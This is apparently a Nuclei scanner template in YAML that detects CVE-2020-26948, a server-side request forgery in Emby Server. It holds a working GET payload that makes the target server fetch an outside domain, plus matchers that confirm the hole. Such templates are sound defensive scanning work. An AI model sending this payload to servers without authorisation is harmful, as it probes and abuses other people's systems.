37 lines
996 B
YAML
37 lines
996 B
YAML
id: CVE-2020-26948
|
|
|
|
info:
|
|
name: Emby Server Server-Side Request Forgery
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter.
|
|
reference:
|
|
- https://github.com/btnz-k/emby_ssrf
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-26948
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-26948
|
|
cwe-id: CWE-918
|
|
tags: cve,cve2020,emby,jellyfin,ssrf
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 500
|
|
- type: word
|
|
words:
|
|
- "Name or service not known"
|
|
part: body
|
|
- type: word
|
|
words:
|
|
- "text/plain"
|
|
part: header
|
|
|
|
# Enhanced by mp on 2022/03/27
|